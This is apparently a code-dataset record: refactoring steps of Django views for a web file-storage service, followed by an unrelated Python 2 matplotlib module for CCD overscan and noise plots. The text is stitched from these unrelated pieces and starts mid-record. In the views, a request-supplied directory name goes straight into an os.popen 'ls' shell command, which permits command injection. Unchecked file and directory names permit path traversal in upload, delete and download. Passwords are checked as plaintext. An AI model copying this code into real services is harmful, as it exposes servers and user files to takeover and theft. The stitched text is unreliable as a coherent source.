dir_name = request.POST.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n 
content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n File = request.FILES.get('file', None)\n if File is None:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n file_name = File.name\n file_path = os.path.join(dir_path, file_name)\n with open(file_path, 'wb+') as f:\n for chunk in File.chunks():\n f.write(chunk)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n@api_check\ndef query_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n dir_path = os.path.join(files_folder, dir_name)\n cmd_info = os.popen('ls -l -h {}'.format(dir_path)).read()\n file_list = cmd_info.split('\\n')[1:-1]\n file_list_data = []\n for file_info_cmd in file_list:\n file_info_list = file_info_cmd.split(' ')\n file_info = list(filter(None, file_info_list))\n file = file_info[-1]\n file_size = file_info[4]\n name_type = file.rsplit('.', 1)\n if len(name_type) < 2:\n name_type.append('未知')\n file_name, file_type = name_type\n file_list_data.append({'file_name': file_name, 'file_type':\n file_type, 'file_size': file_size})\n res = dict(state_code=0, error_msg='ok', data={'file_list': file_list_data}\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n else:\n os.remove(file_path)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef download_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n from django.http import StreamingHttpResponse\n file_size = os.path.getsize(file_path)\n\n def file_iterator(file_name, chunk_size=512):\n with open(file_name, 'rb') as f:\n while True:\n c = f.read(chunk_size)\n if c:\n yield c\n else:\n break\n the_file_name = file_path\n res = file_iterator(the_file_name)\n response = StreamingHttpResponse(res)\n response['Content-Type'] = 'application/octet-stream; charset=UTF-8'\n response['Content-Length'] = file_size\n response['Content-Disposition'] = 'attachment;filename=\"{}\"'.format(\n escape_uri_path(file))\n return response\n",
"step-4": "import os\nimport shutil\nimport json\nfrom django.shortcuts import render, HttpResponse\nfrom django.utils.encoding import escape_uri_path\nfrom django.db import transaction\nfrom web_pan.settings import files_folder\nfrom disk import models\n\n\ndef logined(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n return render(request, 'login.html')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef api_check(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef login(request):\n if request.method == 'GET':\n if request.session.get('user'):\n return render(request, 'index.html')\n return render(request, 'login.html')\n else:\n req = json.loads(request.body)\n user = req.get('username')\n pwd = req.get('pwd')\n obj_user = models.Users.objects.filter(user_name=user).all()\n if not obj_user:\n res = dict(state_code=1, error_msg='用户不存在')\n else:\n password = obj_user.first().password\n if str(pwd) != str(password):\n res = dict(state_code=2, error_msg='密码错误')\n else:\n request.session['user'] = user\n request.session.set_expiry(60 * 60 * 4)\n res = dict(state_code=0, error_msg='密码错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n\n\ndef logout(request):\n if request.session.get('user'):\n del request.session['user']\n return render(request, 'login.html')\n\n\n@logined\ndef index(request):\n return render(request, 'index.html')\n\n\n@api_check\ndef get_dir_list(request):\n user = request.session.get('user')\n obj_dir = models.Dirs.objects.filter(user_name=user).all()\n dir_list = []\n for dirs in obj_dir:\n user_dir = dirs.dir\n dir_list.append(user_dir)\n res = dict(state_code=0, error_msg='ok', data={'dir_list': dir_list})\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef user_mkdir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='该目录已被使用')\n else:\n user = request.session.get('user')\n if user:\n models.Dirs.objects.create(user_name=user, dir=dir_name)\n os.mkdir(dir_path)\n res = dict(state_code=0, error_msg='ok')\n else:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_dir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n else:\n with transaction.atomic():\n obj_dir = models.Dirs.objects.filter(dir=dir_name).all()\n if obj_dir:\n obj_dir.delete()\n shutil.rmtree(dir_path)\n res = dict(state_code=0, eror_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 
'application/json')\n\n\n@api_check\ndef upload_file(request):\n dir_name = request.POST.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n File = request.FILES.get('file', None)\n if File is None:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n file_name = File.name\n file_path = os.path.join(dir_path, file_name)\n with open(file_path, 'wb+') as f:\n for chunk in File.chunks():\n f.write(chunk)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n@api_check\ndef query_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n dir_path = os.path.join(files_folder, dir_name)\n cmd_info = os.popen('ls -l -h {}'.format(dir_path)).read()\n file_list = cmd_info.split('\\n')[1:-1]\n file_list_data = []\n for file_info_cmd in file_list:\n file_info_list = file_info_cmd.split(' ')\n file_info = list(filter(None, file_info_list))\n file = file_info[-1]\n file_size = file_info[4]\n name_type = file.rsplit('.', 1)\n if len(name_type) < 2:\n name_type.append('未知')\n file_name, file_type = name_type\n file_list_data.append({'file_name': file_name, 'file_type':\n file_type, 'file_size': file_size})\n res = dict(state_code=0, error_msg='ok', data={'file_list': file_list_data}\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n else:\n os.remove(file_path)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef download_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n from django.http import StreamingHttpResponse\n file_size = os.path.getsize(file_path)\n\n def file_iterator(file_name, chunk_size=512):\n with open(file_name, 'rb') as f:\n while True:\n c = f.read(chunk_size)\n if c:\n yield c\n else:\n break\n the_file_name = file_path\n res = file_iterator(the_file_name)\n response = StreamingHttpResponse(res)\n response['Content-Type'] = 'application/octet-stream; charset=UTF-8'\n response['Content-Length'] = file_size\n response['Content-Disposition'] = 'attachment;filename=\"{}\"'.format(\n escape_uri_path(file))\n return response\n",
"step-5": "import os\nimport shutil\nimport json\nfrom django.shortcuts import render, HttpResponse\nfrom django.utils.encoding import escape_uri_path\nfrom django.db import transaction\nfrom web_pan.settings import files_folder\nfrom disk import models\n\n\n# Create your views here.\n\n\ndef logined(func):\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n return render(request, 'login.html')\n else:\n return func(request, *args, **kwargs)\n\n return wrapper\n\n\ndef api_check(func):\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n res = dict(\n state_code=-3,\n error_msg=\"登陆过期\"\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n else:\n return func(request, *args, **kwargs)\n\n return wrapper\n\n\ndef login(request):\n if request.method == 'GET':\n if request.session.get('user'):\n return render(request, 'index.html')\n return render(request, 'login.html')\n else:\n req = json.loads(request.body)\n user = req.get('username')\n pwd = req.get('pwd')\n obj_user = models.Users.objects.filter(user_name=user).all()\n if not obj_user:\n res = dict(\n state_code=1,\n error_msg=\"用户不存在\"\n )\n else:\n password = obj_user.first().password\n if str(pwd) != str(password):\n res = dict(\n state_code=2,\n error_msg=\"密码错误\"\n )\n else:\n request.session['user'] = user\n request.session.set_expiry(60*60*4)\n res = dict(\n state_code=0,\n error_msg=\"密码错误\"\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\ndef logout(request):\n if request.session.get('user'):\n del request.session['user']\n return render(request, 'login.html')\n\n\n@logined\ndef index(request):\n return render(request, 'index.html')\n\n\n@api_check\ndef get_dir_list(request):\n user = request.session.get('user')\n obj_dir = models.Dirs.objects.filter(user_name=user).all()\n dir_list = []\n for dirs in obj_dir:\n user_dir = dirs.dir\n dir_list.append(user_dir)\n res = dict(\n state_code=0,\n error_msg='ok',\n data={\n \"dir_list\": dir_list\n }\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\n@api_check\ndef user_mkdir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(\n state_code=-2,\n error_msg='参数错误'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if os.path.exists(dir_path):\n res = dict(\n state_code=1,\n error_msg=\"该目录已被使用\"\n )\n else:\n user = request.session.get('user')\n if user:\n models.Dirs.objects.create(\n user_name=user,\n dir=dir_name\n )\n os.mkdir(dir_path)\n res = dict(\n state_code=0,\n error_msg='ok'\n )\n else:\n res = dict(\n state_code=-3,\n error_msg=\"登陆过期\"\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\n@api_check\ndef del_dir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(\n state_code=-2,\n error_msg='参数错误'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(\n state_code=1,\n error_msg='目录不存在'\n )\n else:\n with transaction.atomic():\n obj_dir = models.Dirs.objects.filter(dir=dir_name).all()\n if obj_dir:\n obj_dir.delete()\n 
shutil.rmtree(dir_path)\n res = dict(\n state_code=0,\n eror_msg='ok'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\n@api_check\ndef upload_file(request):\n dir_name = request.POST.get('dir_name')\n if not dir_name:\n res = dict(\n state_code=-2,\n error_msg='参数错误'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(\n state_code=1,\n error_msg='目录不存在'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n # 获取上传的文件,如果没有文件,则默认为None;\n File = request.FILES.get(\"file\", None)\n if File is None:\n res = dict(\n state_code=-2,\n error_msg='参数错误'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n file_name = File.name\n file_path = os.path.join(dir_path, file_name)\n # 打开特定的文件进行二进制的写操作;\n with open(file_path, 'wb+') as f:\n # 分块写入文件;\n for chunk in File.chunks():\n f.write(chunk)\n res = dict(\n state_code=0,\n error_msg='ok',\n )\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n@api_check\ndef query_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n dir_path = os.path.join(files_folder, dir_name)\n cmd_info = os.popen(\"ls -l -h {}\".format(dir_path)).read()\n file_list = cmd_info.split('\\n')[1:-1]\n file_list_data = []\n for file_info_cmd in file_list:\n file_info_list = file_info_cmd.split(' ')\n file_info = list(filter(None, file_info_list))\n file = file_info[-1]\n file_size = file_info[4]\n name_type = file.rsplit('.', 1)\n if len(name_type) < 2:\n name_type.append('未知')\n file_name, file_type = name_type\n file_list_data.append({\n 'file_name': file_name,\n 'file_type': file_type,\n 'file_size': file_size\n })\n res = dict(\n state_code=0,\n error_msg='ok',\n data={\n 'file_list': file_list_data\n }\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\n@api_check\ndef del_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' 
+ file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder,dir_name),file)\n if not os.path.exists(file_path):\n res = dict(\n state_code=1,\n error_msg='文件不存在'\n )\n else:\n os.remove(file_path)\n res = dict(\n state_code=0,\n error_msg='ok'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n\n\n@api_check\ndef download_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name+'.'+file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder,dir_name),file)\n if not os.path.exists(file_path):\n res = dict(\n state_code=1,\n error_msg='文件不存在'\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')\n from django.http import StreamingHttpResponse\n file_size = os.path.getsize(file_path)\n def file_iterator(file_name, chunk_size=512): # 用于形成二进制数据\n with open(file_name, 'rb') as f:\n while True:\n c = f.read(chunk_size)\n if c:\n yield c\n else:\n break\n the_file_name = file_path # 要下载的文件路径\n res = file_iterator(the_file_name)\n response = StreamingHttpResponse(res) # 这里创建返回\n response['Content-Type'] = 'application/octet-stream; charset=UTF-8' # 注意格式\n response['Content-Length'] = file_size\n response['Content-Disposition'] = 'attachment;filename=\"{}\"'.format(escape_uri_path(file)) # 注意filename 这个是下载后的名字\n return response\n",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
import matplotlib
matplotlib.use('Agg')
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.axes_grid1 import make_axes_locatable
def plot_overscan(overscan, img, TITLE, OUT_DIR):
""" plot overscan in 9x2 plots with 16 channels """
fig = plt.figure(figsize=(20, 20))
gs0 = gridspec.GridSpec(3, 3)
for i, f in enumerate(img):
x = f.dev_index % 3
gs = gridspec.GridSpecFromSubplotSpec(
1, 2, wspace=0, subplot_spec=gs0[f.dev_index])
ax2 = plt.subplot(gs[0, 0])
for j in range(9, 17):
plt.plot(overscan[i, j - 1] + 500 *
(j - 8), label='seg' + str(j + 1))
plt.legend(fontsize=6, loc='upper center', ncol=4)
if x != 0:
ax2.set_yticklabels([])
plt.grid()
plt.xlim(0, 2100)
plt.ylim(0, 4500)
ax2.set_title(f.dev_name + ' (seg 10-17)')
ax1 = plt.subplot(gs[0, 1])
for j in range(1, 9):
plt.plot(overscan[i, j - 1] + 500 * j, label='seg' + str(j - 1))
plt.legend(fontsize=6, loc='upper center', ncol=4)
if x != 2:
ax1.set_yticklabels([])
if x == 2:
ax1.yaxis.tick_right()
plt.grid()
plt.xlim(0, 2100)
plt.ylim(0, 4500)
ax1.set_title(f.dev_name + ' (seg 0-7)')
fig.suptitle('Overscan ' + TITLE, y=0.94, size=20)
plt.subplots_adjust(wspace=0.05)
plt.savefig(OUT_DIR + TITLE + '_spatial.png')
plt.close(fig)
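# Usage sketch (assumed shapes, not stated in this file): `overscan` is an array of
# shape (n_ccd, 16, n_cols) holding one overscan profile per segment, and `img`
# iterates over CCD handles exposing .dev_index in 0..8 and .dev_name (e.g. 'S00'):
#
#     plot_overscan(overscan, img, 'run_label', out_dir + '/')
#
# plot_overscan_diff() below takes the same arguments and only changes the
# reference subtraction applied to each segment.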
def plot_overscan_diff(overscan, img, TITLE, OUT_DIR):
""" plot overscan with subtracted 7th / 17th channel """
fig = plt.figure(figsize=(20, 20))
gs0 = gridspec.GridSpec(3, 3)
for i, f in enumerate(img):
x = f.dev_index % 3
gs = gridspec.GridSpecFromSubplotSpec(
1, 2, wspace=0, subplot_spec=gs0[f.dev_index])
ax2 = plt.subplot(gs[0, 0])
for j in range(9, 17):
plt.plot(overscan[i, j - 1] - overscan[i, 15] +
500 * (j - 8), label='seg' + str(j + 1))
plt.legend(fontsize=6, loc='upper center', ncol=4)
        if x != 0:
ax2.set_yticklabels([])
plt.grid()
plt.xlim(0, 2100)
plt.ylim(0, 4500)
ax2.set_title(f.dev_name + ' (seg 10-17)')
ax1 = plt.subplot(gs[0, 1])
for j in range(1, 9):
plt.plot(overscan[i, j - 1] - overscan[i, 7] +
500 * j, label='seg' + str(j - 1))
plt.legend(fontsize=6, loc='upper center', ncol=4)
        if x != 2:
            ax1.set_yticklabels([])
        if x == 2:
ax1.yaxis.tick_right()
plt.grid()
plt.xlim(0, 2100)
plt.ylim(0, 4500)
ax1.set_title(f.dev_name + ' (seg 0-7)')
# ax1.set_title('S-'+f[7:9]+' (seg 0-7)')
fig.suptitle('Overscan (diff) ' + TITLE, y=0.94, size=20)
plt.subplots_adjust(wspace=0.05)
plt.savefig(OUT_DIR + TITLE + '_diff_spatial.png')
plt.close(fig)
def plot_mean_std_stddelta(m, n, nd, img, TITLE, OUT_DIR):
""" plot std vs. mean vs. std_delta (comparison) """
fig = plt.figure(figsize=(15, 10))
for i, f in enumerate(img):
ax1 = plt.subplot(3, 3, f.dev_index + 1)
lns1 = ax1.plot(m[i], 'o', color='green', label='offset')
ax1.set_ylabel('mean')
ax1.set_xlabel('segment num')
ax2 = ax1.twinx()
lns2 = ax2.plot(n[i], '^', color='blue', label='noise')
ax2.set_ylabel('stdev')
lns3 = ax2.plot(nd[i], 'v', color='red', label='dnoise')
lns = lns1 + lns2 + lns3
labs = [l.get_label() for l in lns]
ax1.legend(lns, labs, bbox_to_anchor=(0., 1.07, 1., .102),
fontsize='small', ncol=3, numpoints=1, loc=9)
plt.grid()
plt.title(' ' + f.dev_name, y=1.15)
fig.suptitle('Offset, noise, dnoise comparison ' + TITLE, y=0.99, size=20)
plt.subplots_adjust(wspace=0.5, hspace=0.6)
plt.savefig(OUT_DIR + TITLE + '_std_vs_mean.png')
plt.close(fig)
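# Note (assumed convention): m (offset), n (noise) and nd (delta-noise) are
# (n_ccd, 16) arrays with one value per segment; the histogram helpers below
# flatten them with ravel() under the same convention.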
def plot_histogram_mean(m, TITLE, OUT_DIR):
fig = plt.figure(figsize=(15, 15))
m_all = m.ravel()
for bin_num in np.arange(10, 100, 10):
plt.subplot(3, 3, bin_num / 10)
plt.hist(m_all, bin_num, facecolor='green')
plt.title('Bins = ' + str(bin_num))
plt.subplots_adjust(wspace=0.2, hspace=0.2)
fig.suptitle('offset histogram ' + TITLE, y=0.92, size=20)
plt.savefig(OUT_DIR + TITLE + '_mean_histo.png')
plt.close(fig)
def plot_histogram_std(n, TITLE, OUT_DIR):
fig = plt.figure(figsize=(15, 15))
n_all = n.ravel()
for bin_num in np.arange(10, 100, 10):
plt.subplot(3, 3, bin_num / 10)
plt.hist(n_all, bin_num, facecolor='green')
plt.title('Bins = ' + str(bin_num))
fig.suptitle('noise histogram ' + TITLE, y=0.92, size=20)
plt.subplots_adjust(wspace=0.2, hspace=0.2)
plt.savefig(OUT_DIR + TITLE + '_std_histo.png')
plt.close(fig)
def plot_histogram_std_dev(nd, TITLE, OUT_DIR):
fig = plt.figure(figsize=(15, 15))
nd_all = nd.ravel()
for bin_num in np.arange(10, 100, 10):
plt.subplot(3, 3, bin_num / 10)
plt.hist(nd_all, bin_num, facecolor='green')
plt.title('Bins = ' + str(bin_num))
fig.suptitle('dnoise histogram ' + TITLE, y=0.92, size=20)
plt.subplots_adjust(wspace=0.2, hspace=0.2)
plt.savefig(OUT_DIR + TITLE + '_stddelta_histo.png')
plt.close(fig)
def plot_histogram_all(m, n, nd, TITLE, OUT_DIR):
plot_histogram_mean(m, TITLE, OUT_DIR)
plot_histogram_std(n, TITLE, OUT_DIR)
plot_histogram_std_dev(nd, TITLE, OUT_DIR)
def plot_histogram_all_one_binning(m, n, nd, TITLE, OUT_DIR, bin_num=45,
num_ccd=9, omit_REBs=[], read_REBs=set([0, 1, 2])):
from matplotlib.patches import Rectangle
if num_ccd != len(read_REBs) * 3:
print "ERROR! num_ccd = %i while number of REBs being read is %i." % (
num_ccd, len(read_REBs)
)
return "\n"
fig = plt.figure(figsize=(15, 6))
m_all = m.ravel()
m_all = m_all[0:16 * num_ccd]
n_all = n.ravel()
n_all = n_all[0:16 * num_ccd]
nd_all = nd.ravel()
nd_all = nd_all[0:16 * num_ccd]
# detect dead channels, DEF: noise <= 5
dead = []
for i in range(16 * num_ccd):
if n_all[i] <= 5:
dead.append(i)
    # do not count non-clocking REBs in the statistics
    # data are stored in the order 22, 21, 20 (REB 2), 12, 11, 10 (REB 1), ...
omit_REBs = set(omit_REBs)
for REB in omit_REBs:
if REB not in [0, 1, 2]:
print "WARNING! Wrong configuration of REBs to omit %s - unrecognized REBs.\nContinuing with all REBs." % str(omit_REBs)
break
else:
if omit_REBs:
print "Omiting REBs %s" % omit_REBs
i = -1
for REB in read_REBs:
i += 1
if REB not in omit_REBs:
continue
pos = len(read_REBs) - i - 1
omit = np.arange(pos * 48, pos * 48 + 48)
dead = np.append(dead, omit)
m_no_dead = np.delete(m_all, dead)
n_no_dead = np.delete(n_all, dead)
# get rid of subtracted channels for dnoise
sub = np.arange(7, 16 * num_ccd, 8)
dead = np.append(dead, sub)
nd_no_dead = np.delete(nd_all, dead)
nd_all = np.delete(nd_all, sub)
    # summary statistics computed only with live channels
if len(n_no_dead):
n_mean, n_median, n_std = np.mean(
n_no_dead), np.median(n_no_dead), np.std(n_no_dead)
else:
n_mean, n_median, n_std = 0, 0, 0
if len(m_no_dead):
m_mean, m_median, m_std = np.mean(
m_no_dead), np.median(m_no_dead), np.std(m_no_dead)
else:
m_mean, m_median, m_std = 0, 0, 0
if len(nd_no_dead):
nd_mean, nd_median, nd_std = np.mean(
nd_no_dead), np.median(nd_no_dead), np.std(nd_no_dead)
else:
nd_mean, nd_median, nd_std = 0, 0, 0
bin_num_lin = 4 * bin_num / 5
bin_num_log = 1 * bin_num / 5
bins_lin = np.linspace(0, 30, bin_num_lin)
val_max = max(max(n_all), max(nd_all))
if val_max <= 30:
val_max = 50
bins_log = np.logspace(np.log10(30), np.log10(val_max), bin_num_log)
ax1 = fig.add_subplot(1, 2, 1)
plt.hist(m_all, bin_num, facecolor='green')
plt.title('Offset')
textstr1 = '$\mu=%.0f$\n$\mathrm{median}=%.0f$\n$\sigma=%.0f$' % (
m_mean, m_median, m_std)
props1 = dict(boxstyle='round', facecolor='green', alpha=0.4)
ax1.text(0.76, 0.97, textstr1, transform=ax1.transAxes, fontsize=10,
verticalalignment='top', bbox=props1)
ax2 = fig.add_subplot(1, 2, 2)
plt.hist(n_all, bins_lin, facecolor='blue', alpha=0.5, label='noise')
plt.hist(nd_all, bins_lin, facecolor='red', alpha=0.5, label='dnoise')
plt.title('Noises')
plt.legend(loc='upper left')
ax2.axvspan(0, 5, hatch='x', fill=False)
ax2.set_xscale('linear')
ax2.set_xlim((0, 30))
ax2.set_xlim(left=0)
ax2.spines['right'].set_visible(False)
ax2.yaxis.set_ticks_position('left')
plt.setp(ax2.get_xticklabels(), visible=True)
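    # split the noise histogram x-axis: a linear panel up to 30 on the left and a
    # log-scaled panel for the tail above 30 appended on the right, sharing the y axis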
divider = make_axes_locatable(ax2)
axLin = divider.append_axes("right", size=1.4, pad=0, sharey=ax2)
axLin.set_xscale('log')
axLin.hist(n_all, bins_log, facecolor='blue', alpha=0.5, label='noise')
axLin.hist(nd_all, bins_log, facecolor='red', alpha=0.5, label='dnoise')
axLin.autoscale()
axLin.set_xlim(left=30)
axLin.spines['left'].set_visible(False)
axLin.yaxis.set_visible(False)
axLin.yaxis.set_ticks_position('left')
textstr2 = '$\mu=%.1f$\n$\mathrm{median}=%.1f$\n$\sigma=%.1f$' % (
n_mean, n_median, n_std)
props2 = dict(boxstyle='round', facecolor='blue', alpha=0.4)
plt.text(1.98, 0.97, textstr2, transform=ax1.transAxes, fontsize=10,
verticalalignment='top', bbox=props2)
textstr3 = '$\mu=%.1f$\n$\mathrm{median}=%.1f$\n$\sigma=%.1f$' % (
nd_mean, nd_median, nd_std)
props3 = dict(boxstyle='round', facecolor='red', alpha=0.4)
plt.text(1.98, 0.80, textstr3, transform=ax1.transAxes, fontsize=10,
verticalalignment='top', bbox=props3)
fig.suptitle(TITLE, y=0.98, size=20)
# plt.subplots_adjust(wspace=0.2, hspace=0.2)
plt.savefig(OUT_DIR + TITLE + '_histo.png')
plt.close(fig)
string_info = "\t%f\t%f\t%f\t%f\t%f\t%f\t%f\t%f\t%f\n" % (
m_mean, m_median, m_std, n_mean, n_median, n_std, nd_mean, nd_median, nd_std)
return string_info
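# The returned row is tab-separated: offset mean/median/std, noise mean/median/std,
# dnoise mean/median/std. Presumably the caller prepends a run label and appends the
# row to a summary file, which plot_one_run_summary() below reads back with
# np.loadtxt (column 0 = run label, columns 1-9 = the nine statistics).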
def plot_summary(data, run, OUT_DIR, SUPTITLE="Runs comparison"):
cols = len(data)
fig = plt.figure(figsize=(25, 9))
x = range(cols)
ax1 = plt.subplot(3, 1, 1)
ax1.plot(x, data[:, 0], 'o', color='darkgreen', label='mean')
ax1.errorbar(x, data[:, 0], marker='o',
color='darkgreen', yerr=data[x, 2], linestyle='None')
ax1.plot(x, data[:, 1], 'o', color='greenyellow', label='median')
ax1.set_ylabel('Offset', color='green')
ax1.legend(numpoints=1)
ax2 = plt.subplot(3, 1, 2)
ax2.plot(x, data[:, 3], 'o', color='darkblue', label='mean')
ax2.errorbar(x, data[:, 3], marker='o', color='darkblue',
yerr=data[x, 5], linestyle='None')
ax2.plot(x, data[:, 4], 'o', color='lightskyblue', label='median')
ax2.set_ylabel('Noise', color='blue')
ax2.set_ylim([0, 20])
# ax2.set_ylim(bottom=0)
ax2.legend(numpoints=1)
ax3 = plt.subplot(3, 1, 3)
ax3.plot(x, data[:, 6], 'o', color='darkred', label='mean')
ax3.errorbar(x, data[:, 6], marker='o', color='darkred',
yerr=data[x, 8], linestyle='None')
ax3.plot(x, data[:, 7], 'o', color='salmon', label='median')
ax3.set_ylabel('DNoise', color='red')
ax3.set_ylim([0, 20])
# ax3.set_ylim(bottom=0)
ax3.legend(numpoints=1)
plt.xticks(x, run, rotation=45, ha='right', fontsize=7)
fig.suptitle(SUPTITLE, y=0.96, size=20)
plt.subplots_adjust(hspace=0.0, bottom=0.20, left=0.05)
plt.savefig(OUT_DIR + 'Runs_summary.png')
plt.close(fig)
def plot_one_run_summary(f, OUT_DIR, SUPTITLE="Run summary"):
data = np.loadtxt(f, usecols=range(1, 10))
run = np.loadtxt(f, usecols=[0], dtype=str)
if data.size == 9:
print "WARNING! Only one row in '%s'. Summary is not plotting.\n" % f
return
plot_summary(data, run, OUT_DIR, SUPTITLE)
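# Usage sketch (assumed file layout: one row per run, first column a run label,
# then the nine statistics in the order produced by plot_histogram_all_one_binning;
# the file name below is only illustrative):
#
#     plot_one_run_summary('noise_summary.txt', out_dir + '/')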
def plot_cor_ccd(a, img, TITLE, OUT_DIR, vmin=0, vmax=0.2):
fig = plt.figure(figsize=(15, 15))
seg = [0, 7, 8, 15]
lab = ["0", "7", "10", "17"]
for i, f in enumerate(img):
ax1 = plt.subplot(3, 3, f.dev_index + 1)
i_min = 16 * i
i_max = i_min + 16
aa = a[i_min:i_max, i_min:i_max]
im = plt.imshow(aa, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)
ax1.set_title(f.dev_name)
ax1.set_xlim(15.5, -0.5)
ax1.set_ylim(-0.5, 15.5)
ax1.set_xticks(seg)
ax1.set_xticklabels(lab)
